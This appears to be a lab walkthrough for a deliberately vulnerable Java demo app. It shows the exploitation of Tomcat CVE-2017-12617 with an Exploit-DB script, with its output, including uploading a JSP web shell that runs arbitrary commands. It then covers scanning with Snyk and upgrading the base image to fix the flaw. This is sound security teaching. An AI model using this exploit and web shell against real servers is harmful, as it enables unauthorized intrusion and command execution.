- Docker Desktop (Mac / Windows) or Docker-CE (Linux) installed
- docker-compose installed
- java-goof app running in container as per top level README instructions
The default base image tomcat:8.5.21 is vulnerable to RCE CVE-2017-12617
and an demonstration exploit, taken from Exploit-DB is available in the exploits directory.
With the app running locally on 0.0.0.0:8080 set up as follows:
cd exploits
source tomcat-rce.sh # Note: this will attempt to automatically grab your host IP and will echo it out, make sure it's correct for your OSNow you can run the check alias to see if the tomcat server is vulnerable.
If it is you should see something similar to the following:
$ check
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
Poc Filename Poc.jsp
File Created ..
http://192.168.1.2:8080 it's Vulnerable to CVE-2017-12617
http://192.168.1.2:8080/Poc.jsp
If you point a browser at http://localhost:8080/Poc.jsp you should get a test page with a bunch of "A" char's - that shows the exploit worked.
Next, run the pwn alias and just hit ENTER at the shell prompt that comes up. (Ignore the error afterward)
$ pwn
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
Uploading Webshell .....
$
Traceback (most recent call last):
File "/exploit.py", line 188, in <module>
shell(str(url),pwn)
File "/exploit.py", line 98, in shell
cmd=input("$ ")
File "<string>", line 0
^
SyntaxError: unexpected EOF while parsing
Now open a browser to http://localhost:8080/pwn.jsp
You should see a blank page with a form containing single field and a Run button. Type any Linux command you want and submit the form.
The results will populate the page.
Example 1: whoami
Example 2: dpkg -l
From the repo top-level directory, find the image tag for the goof app. If you built using docker-compose up --build then the image tag should be java-goof_javagoof:latest
Run a scan with --app-vulns and dump the output to a file because it's going to be huge!
$ snyk container test java-goof_javagoof:latest --file=Dockerfile --app-vulns > snyk.out
\ Analyzing container dependencies for java-goof_javagoof:latest/Dockerfile
...When complete, open the snyk.out file and search for SNYK-JAVA-ORGAPACHETOMCAT-451514
Upgrade org.apache.tomcat:[email protected] to org.apache.tomcat:[email protected] to fix
✗ Arbitrary File Upload [High Severity][https://snyk.io/vuln/SNYK-JAVA-ORGAPACHETOMCAT-551994] in org.apache.tomcat:[email protected]
introduced by org.apache.tomcat:[email protected]
✗ Denial of Service (DoS) [High Severity][https://snyk.io/vuln/SNYK-JAVA-ORGAPACHETOMCAT-451507] in org.apache.tomcat:[email protected]
introduced by org.apache.tomcat:[email protected]
✗ Arbitrary Code Execution [High Severity][https://snyk.io/vuln/SNYK-JAVA-ORGAPACHETOMCAT-451514] in org.apache.tomcat:[email protected]
introduced by org.apache.tomcat:[email protected]
Next, search the file for Recommendations
Tested 289 dependencies for known issues, found 594 issues.
Base Image Vulnerabilities Severity
tomcat:8.5.21 594 234 high, 173 medium, 187 low
Recommendations for base image upgrade:
Minor upgrades
Base Image Vulnerabilities Severity
tomcat:8.5.64 111 22 high, 12 medium, 77 low
Major upgrades
Base Image Vulnerabilities Severity
tomcat:10.0.0 130 36 high, 17 medium, 77 low
Alternative image types
Base Image Vulnerabilities Severity
tomcat:8.5-jdk15-openjdk-oraclelinux7 0 0 high, 0 medium, 0 low
tomcat:10.0-jdk16-corretto 0 0 high, 0 medium, 0 low
tomcat:8.5-jdk8-corretto 0 0 high, 0 medium, 0 low
tomcat:10-jdk15-corretto 0 0 high, 0 medium, 0 low
Kill the running docker-comose process to shut down the app.
Edit the Dockerfile to use the "Major upgrade" recommendation, FROM tomcat:8.5.64 at the top of the final stage.
#FROM tomcat:8.5.21
FROM tomcat:8.5.64
RUN mkdir /tmp/extracted_files
COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist.war /usr/local/tomcat/webapps/todolist.warRe-run docker-compose up --build
Re-run check alias and you should see that the app server is no longer vulnerable.
$ check
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
Poc Filename Poc.jsp
Not Vulnerable to CVE-2017-12617
You can alos show that http://localhost:8080/Poc.jsp did not inject the "AAAA" page